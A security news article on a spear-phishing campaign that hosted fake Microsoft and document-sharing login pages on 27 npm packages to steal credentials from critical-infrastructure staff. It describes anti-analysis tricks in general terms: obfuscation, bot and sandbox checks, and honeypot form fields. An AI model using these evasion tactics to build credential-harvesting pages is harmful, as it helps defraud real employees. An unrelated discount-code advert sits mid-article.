Cybersecurity researchers recently identified a targeted five-month spear-phishing campaign that utilized 27 malicious npm packages to steal credentials from critical infrastructure organizations. By repurposing legitimate package distribution networks as hosting infrastructure, the attackers delivered deceptive login lures that specifically targeted commercial personnel in sectors like manufacturing and healthcare.
Security experts at Socket discovered a sophisticated operation where threat actors uploaded nearly thirty packages across various aliases to the npm registry. Unlike traditional supply chain attacks that rely on users installing malicious code, this campaign used the npm infrastructure as a resilient hosting service for phishing content. The attackers leveraged package content delivery networks to serve deceptive HTML and JavaScript files, making the malicious infrastructure difficult for defenders to dismantle or block through standard security protocols.
The campaign focused heavily on sales and commercial employees within organizations related to critical infrastructure across the United States and its allies. Over two dozen companies in industries such as industrial automation, plastics, manufacturing, and healthcare were specifically selected for these attacks. By masquerading as document-sharing portals or Microsoft sign-in pages, the lures aimed to trick high-value targets into surrendering their corporate credentials to the attackers.
GET 50% Discount for VPN/ANTIVIRUS SOFTWARE AT 911Cyber - CODE: bit5025
Technical analysis reveals that the phishing pages were designed with advanced evasion techniques to bypass automated security scanners and manual inspection. The malicious JavaScript code was frequently obfuscated or heavily minified to frustrate researchers. Furthermore, the lures required human interaction, such as mouse movements or touch input, and performed client-side checks to identify and block bots or sandboxed environments used by security researchers.
Another layer of defense for the attackers included the implementation of honeypot form fields within the phishing pages. These invisible fields were designed to be filled out by automated crawlers but left blank by human users, allowing the attack to terminate if it detected non-human activity. This strategic use of “anti-analysis” controls ensured that the credential-harvesting infrastructure remained hidden from security tools for as long as possible.
The list of identified packages highlights the breadth of the campaign, featuring names like onedrive-verification, secure-docs-app, and sync365 alongside more randomized strings. Despite some of these libraries being flagged or removed, the attackers’ ability to quickly pivot to new aliases and package names demonstrated the durability of their method. This incident underscores a growing trend where legitimate developer tools are weaponized not just for code execution, but as stable platforms for global social engineering operations.
Source: 27 Malicious Npm Packages Used As Phishing Tools To Steal User Login Credentials